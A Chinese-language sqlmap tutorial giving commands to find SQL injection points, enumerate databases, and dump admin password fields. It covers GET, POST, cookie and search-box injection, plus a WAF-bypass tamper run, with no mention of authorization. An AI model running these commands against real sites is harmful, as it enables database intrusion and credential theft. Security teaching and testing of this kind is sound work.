0x00
前言:
kali linux集成了很多工具,其中,sqlmap为测试者所常用的工具(如果使用者的平台为windows则需要下载Python,然后前往sqlmap的官网下载安装包)
安装sqlmap:
apt-get install sqlmap 从你设置的源,下载sqlmap,并安装
检查注入点:
sqlmap -u http://aa.com/star_photo.php?artist_id=11
爆所有数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 –dbs
爆当前数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 –current-db
指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D admin –tables
‘vhost48330’ 为指定数据库名称
指定库名表名列出所有字段
admin,password,
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin –columns
‘admin’ 为指定表名称
指定库名表名字段dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password –dump
‘ac,id,password’ 为指定字段名称
Sqlmap之Post注入
方法一:
sqlmap -r test.txt -p “抓包到的post数据里面的其中一个post参数” –dbs
解释意思/sqlamp进行post注入并且假如存在注入就返回数据库的信息,test.txt文档就是对网页抓到的包全选数据包内容然后保存为test.txt文件,直接-r test.txt是把文档放在与sqlmap同一目录下的才行。-p是指定参数注入,更精准/
假如不是放在与sqlmap同一目录下的话,那么就是sqlmap.py -r D:test.txt -p “抓包到的post数据里面的其中一个post参数” –db
方法二:
sqlmap -u “存在注入的url,一般多用于后台” –data=”抓到的post包的最后一行的内容” -p “指定post包里面的某一个参数”
方法三:
假设有个网站,url地址为:http://www.127.0.0.1/base64?id=10
假如想测试这个页面是否有post注入
用这个方式:sqlmap -u “http://www.127.0.0.1/base64” –data=”id=10” -f –banner –dbs
方法四:
自动注入方法
sqlmap -u “http://xxxxxx.com(cn/net/org)/login.asp(php,aspx,jsp等程序格式)” –forms 一般用于后台注入。
Sqlmap之cookie注入
方法一:
假设有个网站,url地址为:http://www.127.0.0.1/base32?id=45
假如想测试这个页面是否有cookie注入
采用的注入方式如下:sqlmap -u “http://www.127.0.0.1/base32” –data=”id=10” –dbs –level 2
对方法一的解释/level 2是探测等级的意思,这里采用注入选择探测等级为2,当探测等级为2或2以上sqlmap是会尝试注入cookie参数的/
方法二:
sqlmap -u “存在注入url” –cookie=”抓包抓到的cookie”
或者是这样使用:sqlmap.py -u “存在注入url” –cookir=”抓包抓到的cookie” –level 2 //前面讲过了探测等级为2就注入cookie参数的
Sqlmap之搜索框注入
搜索框注入感觉和post注入简直一模一样,只不过形式是注入搜索框而不是
username或password。
方法一:
sqlmap -u “http://xxxxxx.com/search.php(asp,aspx,jsp)” –data=”抓包到的搜索框的信息” -p “指定搜索框里面的一个参数值”
waf绕过
sqlmap -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”